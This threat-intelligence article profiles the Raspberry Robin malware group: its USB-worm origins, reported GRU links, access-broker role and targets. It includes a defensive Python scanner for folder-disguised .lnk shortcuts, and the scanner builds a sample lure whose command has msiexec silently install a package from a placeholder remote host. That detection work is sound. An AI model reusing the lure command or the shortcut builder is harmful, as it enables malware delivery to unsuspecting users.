New research reveals that Raspberry Robin, once a minor player in the cybercrime world, has rapidly developed into a significant threat actor that plays a recurring role in cyberattacks carried out by the Russian government and the groups it backs.

Background

Originally, Raspberry Robin spread as a worm through infected USB drives. Between 2019 and 2023 it predominantly targeted print and copy shops, using malicious Windows shortcut (.lnk) files disguised as folders to trigger its malware when a user opened them.
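The folder-lookalike shortcut lure described above can be hunted for on a mounted USB drive by parsing each .lnk file and checking what it really launches. The following is an added example, not code from Silent Push or from the Raspberry Robin report: it reads the public MS-SHLLINK layout (header plus the StringData fields) and applies three heuristics that are this example's own assumptions rather than indicators from the report: the shortcut targets a command interpreter or LOLBin, it borrows the stock folder icon from shell32.dll (icon index 3), and its file name has no extension so Explorer shows it as a folder. The two sample shortcuts are constructed inline for the demo; the http://198.51.100.7 URL and the file names are placeholders.

```python
"""Parse Windows .lnk (Shell Link) files and flag shortcuts that pose as folders
while launching a command interpreter, the USB lure style described above.
Added example, not code from Silent Push or the Raspberry Robin report: offsets
follow the public MS-SHLLINK layout; the launcher list, folder-icon heuristic and
the sample shortcuts are assumptions built for this demo, not report indicators."""
import os
import struct
from typing import Dict, Iterator, List, Tuple

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 1 << 0, 1 << 1, 1 << 2
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 1 << 3, 1 << 4, 1 << 5
HAS_ICON_LOCATION, IS_UNICODE = 1 << 6, 1 << 7
# StringData fields, in the order the format stores them
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Assumed heuristics for this demo
LAUNCHERS = ("cmd.exe", "msiexec.exe", "rundll32.exe", "powershell.exe",
             "wscript.exe", "cscript.exe", "mshta.exe")
FOLDER_ICON_INDEX = 3  # shell32.dll icon index 3 is the stock closed-folder icon

def parse_lnk(data: bytes) -> Dict[str, object]:
    """Decode the 76-byte header and StringData; IDList/LinkInfo are skipped by size."""
    if (len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    lnk = {"flags": flags, "icon_index": struct.unpack_from("<i", data, 56)[0]}
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:   # uint16 IDListSize, then the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # uint32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit, key in STRING_FIELDS:        # uint16 CountCharacters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            lnk[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return lnk

def suspicious_reasons(lnk: Dict[str, object], filename: str) -> List[str]:
    """Why a shortcut looks like a folder-disguised launcher; [] means clean.
    A launcher target is required, so ordinary shortcuts to folders pass."""
    target = " ".join(str(lnk.get(k, "")) for k in ("relative_path", "arguments")).lower()
    if not any(lb in target for lb in LAUNCHERS):
        return []
    reasons = [f"target runs an interpreter or LOLBin: {target.strip()!r}"]
    icon = str(lnk.get("icon_location", "")).lower()
    if icon.endswith("shell32.dll") and lnk["icon_index"] == FOLDER_ICON_INDEX:
        reasons.append("icon is the stock Windows folder icon")
    stem = os.path.basename(filename)
    stem = stem[:-4] if stem.lower().endswith(".lnk") else stem
    if "." not in stem:                   # Explorer shows "Documents.lnk" as "Documents"
        reasons.append(f"name {stem!r} imitates a folder")
    return reasons

def scan_tree(root: str) -> Iterator[Tuple[str, List[str]]]:
    """Walk a mounted drive (e.g. a USB stick) and yield (path, reasons) for hits."""
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.lower().endswith(".lnk")):
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    reasons = suspicious_reasons(parse_lnk(fh.read()), fn)
            except (OSError, ValueError, UnicodeDecodeError):
                continue
            if reasons:
                yield path, reasons

def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "",
              icon_index: int = 0) -> bytes:
    """Construct a minimal Unicode .lnk carrying only StringData (constructed demo input)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= (HAS_ARGUMENTS if arguments else 0) | (HAS_ICON_LOCATION if icon_location else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, 1, 0, 0, 0, 0)  # attrs, times, size, show, hotkey
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return (header + sd(relative_path) + (sd(arguments) if arguments else b"")
            + (sd(icon_location) if icon_location else b""))

# Constructed samples: a folder-lookalike launcher and a normal document link
LURE_SAMPLE = build_lnk(r"..\..\Windows\System32\cmd.exe",
                        r'/q /c start "" Documents & msiexec /q /i http://198.51.100.7/pkg.msi',
                        r"%SystemRoot%\System32\shell32.dll", FOLDER_ICON_INDEX)
BENIGN_SAMPLE = build_lnk(r"..\Projects\Report.docx")

if __name__ == "__main__":
    for name, blob in (("Documents.lnk", LURE_SAMPLE), ("Report.lnk", BENIGN_SAMPLE)):
        print(name, suspicious_reasons(parse_lnk(blob), name) or "clean")
```

Run `scan_tree("E:\\")` (or the mount point of the drive) to triage a suspect USB stick offline; the parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, so it never resolves the target through the shell and cannot be tricked into executing it. Requiring a launcher target before any other signal counts keeps legitimate folder shortcuts, which also use the folder icon and extension-less names, out of the results.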

Raspberry Robin is now linked to Unit 29155 of the Russian General Staff Main Intelligence Directorate (GRU), a unit known for sabotage, espionage, and disinformation operations against entities worldwide. In that relationship Raspberry Robin acts as an initial access broker (IAB), supplying the initial foothold for cyberattacks carried out by the Russian government and the groups it backs.

The group has since expanded its reach, working with other notable Russia-linked threat actors and malware operations such as LockBit, SocGholish, and Dridex.

Current Operations

    • Raspberry Robin now uses more advanced tradecraft, including compromised QNAP NAS devices, routers, and other IoT devices as infrastructure, together with multilayered malware packing; some samples are wrapped in up to 14 layers.
    • Its business model is selling access to other cybercriminal groups, which makes its involvement in the initial stages of a breach hard to attribute.
    • Raspberry Robin's use of N-day vulnerabilities (publicly disclosed flaws for which a patch already exists but has not yet been applied by the victim) suggests a deep connection to the underground cybercrime economy.

Targets

Raspberry Robin initially focused heavily on the manufacturing and technology sectors, but it has since broadened its scope. Beginning last year, it started targeting industries such as oil and gas, transportation, retail, education, and government.

The majority of victims were government agencies and telecommunications organizations in Latin America, Australia, and Europe. The scale of the threat is notable: its infection attempts were observed at 17% of managed detection and response (MDR) clients worldwide, across a range of industries.

The Bottom Line

Although much remains unknown about Raspberry Robin's infrastructure and operations, its rapid rise signals that the IAB business is thriving. Analysts continue to investigate the group's connections within the cybercrime underground, as well as how it structures its payouts.

Source:hxxps[://]www[.]silentpush[.]com/blog/raspberry-robin/
